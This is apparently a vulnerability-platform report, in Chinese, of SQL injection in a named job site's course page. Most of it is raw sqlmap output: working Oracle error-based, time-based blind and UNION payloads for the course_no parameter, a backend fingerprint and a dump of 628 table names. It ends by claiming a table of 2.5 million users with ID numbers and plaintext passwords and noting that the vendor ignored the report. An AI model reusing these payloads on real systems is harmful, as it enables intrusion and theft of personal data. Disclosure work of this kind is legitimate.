2015-09-06: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经主动忽略漏洞,细节向公众公开
http://www.job168.com/train/course.jsp?all=on&course_no=1 course_no参数
sqlmap resumed the following injection point(s) from stored session:---Parameter: course_no (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: all=on&course_no=1' AND 9846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9846=9846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'QiaE'='QiaE Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: all=on&course_no=1' AND 2678=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(122)||CHR(110)||CHR(80),5) AND 'KrFd'='KrFd Type: UNION query Title: Generic UNION query (NULL) - 29 columns Payload: all=on&course_no=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(106)||CHR(98)||CHR(113)||CHR(116)||CHR(76)||CHR(73)||CHR(115)||CHR(78)||CHR(70)||CHR(90)||CHR(84)||CHR(122)||CHR(79)||CHR(113)||CHR(113)||CHR(106)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---web application technology: Nginx, JSPback-end DBMS: OracleDatabase: NFRC[628 tables]+--------------------------------+| NEWÔÖÁŻÍŹ˛˝ÁÔ͡ŹŇŔÚ$_TEMP || ÔÖÁŻÍŹ˛˝ÁÔ͡ŹŇŔÚ_ĐÂ$_TEMP || ÔÖÁŻÍŹ˛˝ÇÓÖ°ŹŇŔÚ$_TEMP || ÔÖÁŻÍŹ˛˝Č˲ĹČËĘ¡¨ŠĆ$_TEMP || ÔÖÁŻÍŹ˛˝ŐĐƸĐĹϢ$_TEMP || ˇŹŘŽĽĽÎŤ || AB || ACCESSLOG || ACCESS_STATISTIC || ACTIVEEMAIL || ACTIVELOG || AD_AUTO || AD_DESIGN || AD_OPEN_LOG || AD_STAT || AD_TRACER || AGENCY_MATERIAL || AGENCY_NOTICE || AGENCY_PERSON || AGENCY_PROGRESS || AGENCY_SERVICE || AGENCY_TRACER || ALEXA || ALEXA_BK || ALEXA_PRIZE || ALIPAY || ALIPAY_OUTLET || ANGEL_P || ANGEL_P_BK || APPLYLOG || APPLYLOG_BK || APPLYLOG_TEMP || APP_FEEDBACK || APP_LOG || APP_RECRUIT_SHAKE || APP_VERSION || ASIAN_PHOTO || ASIAN_PHOTO_VOTE || ASIAN_PHOTO_VOTE_BK || ASSIGN || ASSIGN2 || BBS_USER || BLOG_ALBUM || BLOG_ARTICLE || BLOG_FRIEND || BLOG_INFO || BLOG_MSG || BLOG_PERSON || BLOG_PHOTO || BLOG_RANK || BLOG_REPLY || BLOG_REPORT || BLOG_TYPE || BROAD_MESSAGE || CARD || CC || CLAIM || COMMON_EXCHANGE || COMMON_GOODS || COMMON_GOODS_HIPIAO || COMMON_GOODS_OWNS || COMMON_GOODS_OWNSLOG || COMMON_PRODUCT || COMPANY || COMPANY_APPLYFUNC || COMPANY_BACKUP || COMPANY_DEGREE || COMPANY_FIELD || COMPANY_INDUSTRY || COMPANY_PROPERTY || COMPANY_STATICS || COMPANY_WORKLOC || COMPANY_WORKYEARS || COM_POPULOR_WORD || COURSEWARE || CTIBILL || CUSTOMER_MOBILE || CUSTOM_INFO || CYDS_ARTICLE || CYDS_INFO || CYDS_MEMBER || CYDS_PROJ || CYDS_PROJ_2012 || CYDS_PROJ_BAK || CYDS_PROJ_BK || CYDS_SCHOOL || CYDS_SCHOOL_2012 || CYDS_SCORE || CYDS_SCORE_2012 || CYDS_USERS || CYDS_VOTE || C_AD || C_ASSIGN || C_ASSIGN2 || C_ATTACHMENT || C_ATTACHMENT_HISTORY || C_CONTACT || C_CUSTOM || C_ENGLISH || C_EXPORT || C_EXT_FEE || C_FAVORITE || C_FAVORITE_TYPE || C_FEE_HISTORY || C_HRA_TRACER || C_ID5_FEE || C_ID5_TRACER || C_INTEGRAL || C_JYPPH || C_OP_LOG || C_PICTURE || C_REPLY || C_RESUME_LOG || C_SURVEY || C_TRACER || C_XQT || DATAYEAR || DELIVERY_COMPANY || DELIVERY_RESUME || DEPARTMENT || DEVELOP_ASSIGN || DEVELOP_ROBIN || DEVELOP_SHIELD || DEVELOP_TRACE || DIC_AUTH || DIC_BLOG_TMPL || DIC_COURSE || DIC_COURSE1 || DIC_COURSE2 || DIC_DEGREE || DIC_DEPT || DIC_EMPNUM || DIC_FIELD || DIC_FIELD2 || DIC_FUNC || DIC_FUNC_CATEGORY || DIC_FUNC_TYPE || DIC_FUND || DIC_H_CLIENT || DIC_H_COOPERATE || DIC_H_INDUSTRY || DIC_H_PACT_TMPL || DIC_H_PROPERTY || DIC_H_REGION || DIC_INDUSTRY || DIC_LANGUAGE || DIC_LEVEL || DIC_LEVEL2 || DIC_MEMBER_TYPE || DIC_OPERATOR || DIC_PROPERTY || DIC_REGION || DIC_REGION_STREET || DIC_SALARY || DIC_SALARY2 || DIC_SCHOOL_KIND || DIC_SCHOOL_PROPERTY || DIC_SVC || DIC_TAG || DIC_TALENT_TYPE || DIC_TITLE || DRAW || DXC_SOLD || DXC_VIP || EDM_TMP || EMAIL_BLACKLIST || EMAIL_LOG || EMAIL_RECORD || EMAIL_SETTING || EMAIL_TEMPLATE || ENROLL || ENTERGZ || ENTRY || ENTRY_EDUC || ENTRY_OTHER || ENTRY_POS || ENTRY_SCORE || EVAL_MODEL || EXAM_ACTIVE || EXAM_COURSE || EXAM_COU_TUTO || EXAM_FEE || EXAM_REGIST || EXAM_RESEARCH || EXAM_SCHEDULE || EXAM_SEND_SMS || EXAM_SIGNIN || EXAM_SMSREQ || EXAM_STUDENT || EXAM_TEACHER || EXAM_TRACE || EXAM_TRAIN_BOOKING || EXAM_TUTORIAL || EXAM_TUTO_TAKE || EXCEL_COMPANY || FAIR_APPLY_LOG || FAIR_APPLY_STALL || FAIR_FEEDBACK || FAIR_LOC || FAIR_RECRUIT || FEEDBACK || FEEDBACK2 || FEEDBACK3 || FIFA_FANS || FIFA_POST || FIFA_TEAM || FROM2FUTURE || GLOBAL_USER || GOLDTURNTABLE_LOG || GOLDTURNTABLE_PRIZE || GOLDTURNTABLE_TICKET || GZSA || GZ_GRADUATE || HRA_COMPETENCY || HRA_LAW || HRA_SUBJECT || HRA_S_BASE_DATA_2010 || HRA_S_BASE_DATA_2012 || HRA_S_CITY || HRA_S_CITY_07 || HRA_S_DEGREE_FACTOR_2010 || HRA_S_DEGREE_FACTOR_2012 || HRA_S_DETAIL_FACTOR_2010 || HRA_S_DETAIL_FACTOR_2012 || HRA_S_EMPLOYEE_NUM_FACTOR_2010 || HRA_S_EMPLOYEE_NUM_FACTOR_2012 || HRA_S_INDUSTRY || HRA_S_INDUSTRY_07 || HRA_S_INDUSTRY_FACTOR_2010 || HRA_S_INDUSTRY_FACTOR_2012 || HRA_S_LOCATION_2010 || HRA_S_LOCATION_2012 || HRA_S_LOC_FACTOR_2010 || HRA_S_LOC_FACTOR_2012 || HRA_S_PERCENT_FACTOR_2010 || HRA_S_PERCENT_FACTOR_2012 || HRA_S_POSITION || HRA_S_POSITION_07 || HRA_S_POSITION_2010 || HRA_S_POSITION_2012 || HRA_S_POSITION_STAT || HRA_S_POSITION_STAT_07 || HRA_S_PROPERTY_FACTOR_2010 || HRA_S_PROPERTY_FACTOR_2012 || HRA_S_SAMPLE_ANALYSIS_2010 || HRA_S_SAMPLE_ANALYSIS_2012 || HRA_S_SAMPLE_STAT || HRA_S_SAMPLE_STAT_07 || HRA_S_WORKYEAR_FACTOR_2010 || HRA_S_WORKYEAR_FACTOR_2012 || HRA_TEMPLATE || HRA_TEMP_TYPE || HRS_PERSON || HRS_P_EDUC || HRS_P_EXP || HRS_P_VOL || HR_NOTE || HUNTER || HUNTER_COMPANY || HUNTER_C_ENGLISH || HUNTER_PERSON || HUNTER_RECRUIT || H_APPLYLOG || H_APPRAISE || H_ATTACHMENT || H_ATTACHMENT_P || H_CANDIDATE || H_CANDIDATE_BAK || H_CANDIDATE_BK || H_CHANGE || H_COMMEND || H_COMPANY || H_COMPANY_BK || H_C_EDUC || H_C_EDUC_BK || H_C_EXP || H_C_EXP_BK || H_C_TAG || H_DEL_LOG || H_DESCRIPT || H_EMAIL || H_FEEDBACK || H_FEEDBACK2 || H_FEEDBACK2_BK || H_FEEDBACK_OL || H_INV || H_MESSAGE || H_PACT || H_PACT2 || H_PAYLOG || H_PHOTO || H_RECOMMEND || H_RECRUIT || H_RECRUITLOG || H_R_EDUC || H_R_EXP || H_SEARCH || H_SERVICE || H_SERVICE_BK || H_TEXT || H_TRACE || H_TRACE2 || H_TRACE2_BK || H_TRACE_BK || H_VISIT_LOG || ID5ADJ || IDCARD_TEMP || IND_POPULOR_WORD || INFO || INFO_ATTACHMENT || INFO_POSITION || INFO_PY || INFO_REPLY || INTOGZ_APPLYLOG || INTOGZ_COMPANY || INTOGZ_RECRUIT || INTOGZ_REQUIREMENT || INVEST || JOB168BABY || JOB168BABY_GUESS || JOB168BABY_VOTE_LOG || JOB168BABY_VOTE_LOG_BK || JOB168E || JOB168E_REPLY || JOB168E_TMP || JOB168E_TMP2 || JOB168E_TMP3 || JOB_FAIR || JZ_ACCESS || JZ_FAQ || JZ_PERSON || JZ_USER || JZ_USER_ACCESS || KEDUO_USER || LINK_CLICK_LOG || LOCKEDEMAIL || LOG114 || MAIL || MAILDS_LOG || MAILDS_OPEN_LOG || MAIL_BL || MAIL_SUBSCRIPT || MAP2010_FIELD || MAP2010_FUNC || MAP2010_INDUSTRY || MAP2010_REGION || MAP2011_FUNC || MEETING || MEETING_APPLY || MEETING_APPLY_RECRUIT || MEETING_ARTICLE || MEETING_BOOTH || MEETING_RELATE || MEETING_SIGNIN || MEETING_SIGNIN_LOG || MEMBERFEE || MEMBERFEE2 || MEMBERFEE_BK || MEMBER_FEE || MESSAGE || NETPAY_OUTLET || NEWSPAPER_BOARD || NEWSPAPER_DETAIL || NEWSPAPER_SECOND || NFRC2GZRIS || NOAHSARK || OAUTH_CONNECT || OK309_CARD || OK309_USER || OLDPHOTO || OLDPHOTO_VOTE_LOG || OP || OP200910301316 || OV_TRANSACTION || O_APPLYLOG || O_COMPANY || O_RECRUIT || O_TRACE || P || PARTNER || PAYMENTLOG || PERSON || PERSON_APPLYFUNC || PERSON_BACKUP || PERSON_DEGREE || PERSON_FIELD || PERSON_INDUSTRY || PERSON_PROPERTY || PERSON_SKILL || PERSON_STATICS || PERSON_SYNC || PERSON_TEMPLATE || PERSON_WORKLOC || PERSON_WORKYEARS || PHOTO || PLAN_TABLE || POCOUSER || POCOZINE || POCO_SERVICE || POCO_SERVICE_BUY || POCO_TEMPLATE || POCO_TEMPLATE_BUY || PP || PREPARE_COMPANY || PRESSIE_APPLY || PRESSIE_APPLY_DETAIL || PRESSIE_APPLY_INTEGRAL || PRICE_C_AD || PRICE_C_CUSTOM || PRICE_C_NP || PRICE_C_STD || PRICE_C_VER || PRODUCT || PRODUCT_PACKAGE || PRODUCT_PRICE || PT_APP_REGIST || PT_APP_VIEW || PT_BASE || PT_CERT || PT_C_COMPLAINT || PT_C_REVIEW || PT_C_SCORE || PT_EDUC || PT_EXP || PT_PROJ || PT_P_COMPLAINT || PT_P_REVIEW || PT_P_SCORE || PYZP_SIGNUP || P_ADDRESS || P_ARMY || P_ARTICLE || P_ARTICLE_BK || P_ATTACHMENT || P_AUTH || P_CARD || P_CERT || P_COLLECT || P_CUSTOM || P_DEGREE_CERT || P_EDUC || P_ENGLISH || P_ETCSVC || P_EVAL || P_EVAL_NEW || P_EXP || P_EXT_FEE || P_EXT_FEE2 || P_FAVORITE || P_FAVORITE_TEMP || P_FEE_HISTORY || P_ID || P_ID5 || P_INVEST_LOGIN || P_IVEST || P_NOTICE || P_OP_LOG || P_ORDER || P_OTHER || P_PRIZE || P_PROJ || P_REG_SPAM || P_RESUME || P_SAMPLING || P_SCHOOL || P_SEARCH_LOG || P_SENDOUT || P_SEND_FRIEND || P_SERVICE || P_SERVICE_LOG || P_SKILL || P_SMS_SVC || P_SMS_SVC2 || P_TASK || P_TASK_LOG || P_TEMPLATE || P_TEXT || P_TRACER || P_VISIT_LOG || P_VOL || P_XQT || QA || QUARTER_SUM || QUERYPASS2LOG || Q_BODY || Q_DIM || Q_ELEMENT || Q_EXPR || Q_MAP || Q_MODULE || Q_PAPER || Q_REMARK || Q_TOPIC || Q_VALUE || RCJ_ASSIGN || RCJ_SCORE || RCJ_USERS || RECRUIT || RECRUITLOG || RECRUIT_APPLY_RELATED || RECRUIT_BK || RECRUIT_CATALOG || RECRUIT_PYZP || RECRUIT_RECYCLED || RECRUIT_S || RECRUIT_TMP || REFERRER_TEMP || RESUME || RESUMEOUT_LOG || ROBIN_EXCEL_COMPANY || RR || SALARY_CITYCOEFFICIENT || SALARY_CITYCOEFFICIENT_07 || SALARY_DESCRIPTION || SALARY_DESCRIPTION_07 || SALARY_INDUSTRYCOEFFICIENT || SALARY_INDUSTRYCOEFFICIENT_07 || SALARY_POSITION || SALARY_POSITION_07 || SALARY_SAMPLEANALYSIS || SALARY_SAMPLEANALYSIS_07 || SALARY_STAT || SALESMAN || SCHOOL || SCHOOL_FIELD || SCHOOL_INFO || SCHOOL_MEMBER_FEE || SCHOOL_PAYMENTLOG || SCHOOL_PERSON || SCHOOL_PHOTO || SCHOOL_RECRUITLOG || SCHOOL_REQ || SCHOOL_STUDINFO || SHOP_APPLY || SHOP_ARTICLE || SHOP_ARTICLE_STORE || SHOP_BUSINESS || SHOP_BUSINESS_LIMITS || SHOP_COUPON || SHOP_CUSTOMER || SHOP_DELIVERY || SHOP_GOODS || SHOP_GOODS_BELONG || SHOP_GOODS_BRAND || SHOP_GOODS_PIC || SHOP_GOODS_REPLY || SHOP_GOODS_TYPE || SHOP_HRCOST || SHOP_MEMBER_LEVEL || SHOP_ORDER || SHOP_ORDER_DETAIL || SHOP_PAY || SHOP_POSTAGE || SHOP_REPORT || SHOP_SALESCOST || SHOP_STOCK || SHOP_STOCK_ORDER || SHOP_STOCK_ORDER_DETAIL || SHOP_STRATEGY || SHOWCASE || SHOWCASE_AD || SIGNUP || SMS || SMS_ANTI_RESEND || SMS_CUSTOM || SMS_CUSTOM_LIST || SMS_MESSAGE || SMS_MO || SMS_NO_ID || SMS_NUMBER || SMS_NUMBER2 || SMS_REQUIREMENT || SMS_TEMP || SMS_TRACER || SMS_WHITELIST || SMS_WHITELIST_APPLY || SOFT_COMPANY || STATISTIC_CUSTOM || STUDENT_ASSIGN || SUB_COMPANY || SURVEY || SURVEY2 || SURVEY2_REPT || SURVEY_REPT || S_CUSTOM || S_FAVORITE || S_RECRUITMENT || S_SIGNUP || TAG_MAP || TALENT_KEYWORD_LOG || TASK_LOG || TBBBS || TBBBSORTS || TEMP_COMPANY || TEMP_CTI || TEMP_FAIL || TEMP_PERSON || TEMP_RECRUIT || TEMP_USER || TENPAY || TMP_ASSIGN || TMP_EMAIL_LOG || TRACE_LOG || TRAINING || TRAIN_APPLY || TRAIN_APPLY2 || TRAIN_CONSUME_LOG || TRAIN_COURSE || TRAIN_ORGAN || TRAIN_ORGAN_FEE || TRAIN_ORGAN_FEE_BK || TRAIN_PAYMENTLOG || TRAIN_TRAINER || TRANSFER || TRANSFER2 || TUTORIAL_STORE || T_CHG_ORDER || UNIONPAY || UNIT_KEYWORD_LOG || X_COMPANY || X_COMPANY_FEE || X_PERSON || X_PERSON_FEE || X_TRACE || ZSQZTLOG || ZSQZTVALID || ZYGH_COLLEGE || ZYGH_CPBG |+--------------------------------+
GLOBAL_USER表中涉及250万信息:
包括身份证号,账号和明文密码等信息:
危害等级:无影响厂商忽略
忽略时间:2015-09-11 11:18
漏洞Rank:4 (WooYun评价)
暂无
